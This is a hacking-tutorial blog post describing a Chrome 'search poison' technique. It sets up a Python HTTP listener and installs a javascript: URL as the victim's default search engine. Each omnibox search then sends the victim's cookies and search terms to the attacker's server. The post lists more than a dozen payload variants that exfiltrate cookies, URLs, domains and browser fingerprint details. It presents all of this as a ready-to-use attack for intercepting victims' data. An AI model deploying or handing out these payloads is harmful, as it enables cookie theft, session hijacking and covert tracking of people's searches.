metalkey

Hacking tutorials + info

Google Chrome Search Poison – Default Search Engine Exploit

August 27, 2017

Introduction

In December 2015, I discovered a vulnerability in Google Chrome's default search engines feature allowing for the execution of malicious JavaScript whenever the victim performs a search using the omnibox (i.e. URL textbox).
The malicious JavaScript can be set to perform various functions including: Cookie Stealing, Search Keywords Interception, Browser Fingerprinting, etc...
In this walkthrough we'll set up a Python SimpleHTTPServer and intercept the victim’s Cookies and search keywords.

Note: The vulnerability was reported to the Google/Chromium team but was considered a feature rather than a vulnerability.

Video Demo

The video demonstration involves manipulation of the chrome master-preferences file to infect the user with the malicious search engine. The user is then directed to the attackers apache server, which extracts the search query, cookies and other system information and seamlessly directs them back to their search.

Walkthrough - Setting up the Listener in Kali

root@kali:~$ python -m SimpleHTTPServer 80

Setup on Victim Machine

  1. Go into "Settings" in Google Chrome
  2. Click on "Manage Search Engines"
  3. Enter your malicious JS and click "Make Default"

Example

javascript:window.location='http://192.168.1.182/%s'+escape(document.cookie);

Note: 192.168.1.182 is our SimpleHTTPServer.
Now whenever the victim searches using Google Chrome’s Omnibox, the malicious JS will trigger, forwarding you their cookie and search string (%s).

Other examples

javascript:window.location=’http://192.168.1.182/%s ‘+escape(document.cookie);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(document.baseURI);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(document.domain);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(document.URL);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(location.host);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(navigator.appCodeName);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(navigator.appName);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(navigator.appVersion);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(navigator.platform);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(navigator.userAgent);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(navigator.platform);
javascript:window.location=’http://192.168.1.182/%s ‘+escape(navigator.product);

Tags: search-poison